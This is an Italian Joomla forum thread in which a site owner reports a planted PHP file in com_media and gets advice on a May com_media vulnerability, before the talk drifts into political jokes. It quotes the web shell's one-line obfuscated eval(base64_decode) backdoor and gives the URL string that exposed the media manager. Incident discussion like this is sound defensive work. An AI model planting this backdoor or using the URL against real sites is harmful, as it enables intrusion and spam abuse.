PHP injection

[claudio65]

 Buon caldo a tutti,
in seguito ad un warning inviatomi dal mio server per disck space ho potuto constatare che nel mio sito e più precisamente nella dir components/com_media vi era un uno script h0rked.php contenete quanto segue: <?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>
Tale file permetteva il richiamato dall'esterno, di inviare mail al mondo e quindi la mia Default Email Account si stava riempiendo  di Mail Delivery Failed.
Ho prontamente eliminato il file ho cambiato tutte le password DB - cPanell ecc. ho aggiornato Gantry e un menù commerciale che quindi non cito. Joomla era già aggiornato da tempo a 2.5.11 ma a giudicare dalla cartella del rinvenimento mi pare di capire che il punto d'accesso non è tramite componente modulo o plg ma nel CMS.
Qualcuno ha suggerimenti per rafforzare la mi azione preventiva che non mi pare sufficiente?
 

[mau_develop]

...e sei sicuro che non te lo porti dietro da un po'... diciamo ...maggio?
... dove qs funzionava
index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

[claudio65]

 Perdonami ho studiato un pochino in quanto se dovessi essere come Calderoli  mi sarei già sparato  ma  le mie conoscenze non mi consentono di cogliere a pieno la tua indicazione.
Io ho la sensazione che sia da maggio ma tu lo sai per certo, quindi se mi dai una spiegazione  idiot proof mi aiuteresti ad allontanarmi sempre di più dal Modello Calderoli
 


Quindi oltre che a me faresti un'opera buona per l'umanità
 
 

[mau_develop]

quella vunerabilità è di maggio, credo sia stata segnalata e corretta (?!) ... spero
Con quella vulnerabilità fai un po quello che è successo a te, basta che incolli quella stringa nel path del tuo sito e se vedi la schermata delle cartelle media... sei rovinato altrimenti dovresti vedere un messaggio che non sei autorizzato a vedere la risorsa.

[claudio65]

Grazie M W C come al solito le tue indicazioni sono preziose.
Digitando la stringa da te indicata nell'URL fortunatamente appare Errore Non sei autorizzato a vedere questa risorsa. Quindi non raggiungono la dir.
Ne conseguo che la vulnerabilità sia stata corretta e che al momento il sito dovrebbe essere sistemato.
Ti ringrazio e ti ringraziano anche tutti gli oranghi e le persone normali del mondo

[mau_develop]

silvio non disdegnava gli oranghi..anzi avevano quel nonsochè di esotico.
secondo me l'avrebbe invitata a cena facendole trovare un pentolone al fuoco al centro di villa s.martino e lui sarebbe arrivato nudo legato ad un palo come il leone catturato, con fede e mora che lo trasportavano uno davanti e l'altro di dietro...

[claudio65]

 Silvio, Silvio è uno dei nostri grossi malanni, ma il più grosso malanno di un popolo è quel indefinibile atteggiamento che li spinge a seguire personaggi come Hitler, Stalin, Mussolini, Pinochet, Silvi e tantissimi altri.
E' sempre colpa degli altri è sempre colpa del diverso se la nostra vita non funziona , mica ci fermiamo a fare un minimo di autocritica.
Comunque l'immagine di Silvio nudo legato al palo mi piace ma dietro decisamente ci metterei Lele mora
 
cazz... lina vedi a parlare di certi personaggi mi sono distratto e ho briciacchiato lo spezzatino

[mau_develop]

comunque, come dicevo, non sono sicuro sia stata corretta, presumo di si magari fai un controllo nelle versions quando esisteva quel problema.
Dopo guardo se ce ne sono altri...